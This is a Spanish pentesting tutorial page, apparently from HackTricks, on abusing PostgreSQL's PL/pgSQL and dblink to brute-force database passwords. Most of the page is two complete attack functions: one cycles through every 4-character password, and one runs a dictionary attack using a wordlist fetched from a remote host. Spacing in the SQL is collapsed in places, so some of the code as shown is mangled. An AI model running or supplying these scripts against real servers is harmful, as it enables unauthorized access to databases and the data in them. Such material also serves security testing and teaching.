¿Trabajas en una empresa de ciberseguridad? ¿Quieres ver tu empresa anunciada en HackTricks? ¿O quieres tener acceso a la última versión del PEASS o descargar HackTricks en PDF? ¡Consulta los PLANES DE SUSCRIPCIÓN!
PL/pgSQL es un lenguaje de programación completo que va más allá de las capacidades de SQL al ofrecer control procedural mejorado. Esto incluye la utilización de bucles y diversas estructuras de control. Las funciones creadas en el lenguaje PL/pgSQL pueden ser invocadas por declaraciones SQL y desencadenadores, ampliando el alcance de las operaciones dentro del entorno de la base de datos.
Puedes abusar de este lenguaje para pedirle a PostgreSQL que realice un ataque de fuerza bruta a las credenciales de los usuarios, pero estas deben existir en la base de datos. Puedes verificar su existencia usando:
SELECT lanname,lanacl FROM pg_language WHERE lanname ='plpgsql';lanname | lanacl---------+---------plpgsql |
Por defecto, crear funciones es un privilegio otorgado a PUBLIC, donde PUBLIC se refiere a todos los usuarios en ese sistema de base de datos. Para prevenir esto, el administrador podría haber tenido que revocar el privilegio de USO del dominio PUBLIC:
REVOKE ALL PRIVILEGES ONLANGUAGE plpgsql FROM PUBLIC;
En ese caso, nuestra consulta anterior produciría resultados diferentes:
SELECT lanname,lanacl FROM pg_language WHERE lanname ='plpgsql';lanname | lanacl---------+-----------------plpgsql | {admin=U/admin}
Ten en cuenta que para que el siguiente script funcione la función dblink debe existir. Si no existe, podrías intentar crearla con el siguiente comando:
CREATE EXTENSION dblink;
Fuerza bruta de contraseñas
Aquí te mostramos cómo podrías realizar un ataque de fuerza bruta de contraseñas de 4 caracteres:
//Create the brute-forcefunctionCREATE OR REPLACEFUNCTIONbrute_force(host TEXT, port TEXT,username TEXT, dbname TEXT) RETURNSTEXTAS$$DECLAREword TEXT;BEGINFOR a IN65..122LOOPFOR b IN65..122LOOPFOR c IN65..122LOOPFOR d IN65..122LOOPBEGINword := chr(a) || chr(b) || chr(c) || chr(d);PERFORM(SELECT*FROM dblink(' host='|| host ||' port='|| port ||' dbname='|| dbname ||' user='|| username ||' password='|| word,'SELECT 1')RETURNS (i INT));RETURN word;EXCEPTIONWHEN sqlclient_unable_to_establish_sqlconnectionTHEN-- do nothingEND;ENDLOOP;ENDLOOP;ENDLOOP;ENDLOOP;RETURNNULL;END;$$ LANGUAGE'plpgsql';//Call the functionselect brute_force('127.0.0.1', '5432', 'postgres', 'postgres');
Toma en cuenta que incluso el descifrado de 4 caracteres puede llevar varios minutos.
También podrías descargar un diccionario de contraseñas y probar solo esas contraseñas (ataque de diccionario):
//Create the functionCREATE OR REPLACEFUNCTIONbrute_force(host TEXT, port TEXT,username TEXT, dbname TEXT) RETURNSTEXTAS$$BEGINFOR word IN (SELECT word FROM dblink('host=1.2.3.4user=namepassword=qwertydbname=wordlists','SELECT word FROM wordlist')RETURNS (word TEXT)) LOOPBEGINPERFORM(SELECT*FROM dblink(' host='|| host ||' port='|| port ||' dbname='|| dbname ||' user='|| username ||' password='|| word,'SELECT 1')RETURNS (i INT));RETURN word;EXCEPTIONWHEN sqlclient_unable_to_establish_sqlconnection THEN-- do nothingEND;ENDLOOP;RETURNNULL;END;$$ LANGUAGE'plpgsql'-- Call the functionselect brute_force('127.0.0.1', '5432', 'postgres', 'postgres');
¿Trabajas en una empresa de ciberseguridad? ¿Quieres ver tu empresa anunciada en HackTricks? ¿O quieres tener acceso a la última versión del PEASS o descargar HackTricks en PDF? ¡Consulta los PLANES DE SUSCRIPCIÓN!